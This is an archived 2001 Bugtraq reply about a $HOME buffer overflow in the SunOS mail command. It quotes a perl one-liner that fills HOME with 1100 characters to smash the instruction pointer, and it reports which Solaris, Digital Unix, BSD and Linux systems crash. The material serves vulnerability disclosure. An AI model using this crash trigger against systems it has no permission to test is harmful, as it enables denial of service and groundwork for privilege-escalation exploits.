Bugtraq mailing list archives
Re: $HOME buffer overflow in SunOS 5.8 x86
From: Gunnar Wolf <gwolf () campus iztacala unam mx>
Date: Tue, 5 Jun 2001 13:54:11 -0500 (CDT)
On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:$HOME buffer overflow in SunOS 5.8 x86 Systems affected: SunOS 5.8 x86 have not tested on other OSes Risk: Medium Date: 4 June 2001 Details: HOME=`perl -e 'print "A"x1100'` ; export HOME mail a CTL-C eip gets smashed with 0x41414141.0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME 0:jpmeier@sol:/home/jpmeier> mail a ^Cmail: Mail saved in dead.letter 1:jpmeier@sol:/home/jpmeier> uname -a SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10 also tried larger buffers. Solaris/sparc appears not vulnerable. Maybe its an x86 bug only
Solaris 7/Sparc is vulnerable: [gwolf@sun gwolf]$ uname -a SunOS sun.mydomain.org 5.7 Generic_106541-16 sun4u sparc SUNW,Ultra-5_10 [gwolf@sun gwolf]$ HOME=`perl -e 'print "A"x1100'` ; export HOME [gwolf@sun gwolf]$ mail a ^Cmail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 mail: ERROR signal 10 (...) Digital Unix V4.0C is vulnerable: digital> uname -a OSF1 digital V4.0 564.32 alpha digital> setenv HOME `perl -e 'print "a"x1100'` Received disconnect: Command terminated on signal 6. [and I am logged out of the machine] I tested it also on OpenBSD 2.8/i386 and /sparc, RedHat Linux 6.1/alpha and Debian GNU/Linux 2.2r3/i386, and they are not vulnerable. ------------------------------------------------------------ Gunnar Wolf - gwolf () campus iztacala unam mx - (+52)5623-1119 Desarrollo y Admon. de Sistemas en Red - FES Iztacala - UNAM Departamento de Seguridad en Computo - DGSCA - UNAM ------------------------------------------------------------ Quidquid latine dictum sit, altum viditur.
Current thread:
- $HOME buffer overflow in SunOS 5.8 x86 Georgi Guninski (Jun 04)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Juergen P. Meier (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Gunnar Wolf (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Tohru Watanabe (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Patrick Finch (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Kris Kennaway (Jun 08)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Gunnar Wolf (Jun 05)
- <Possible follow-ups>
- Re: $HOME buffer overflow in SunOS 5.8 x86 SChoe (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Nicolas Dubee (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Juergen P. Meier (Jun 05)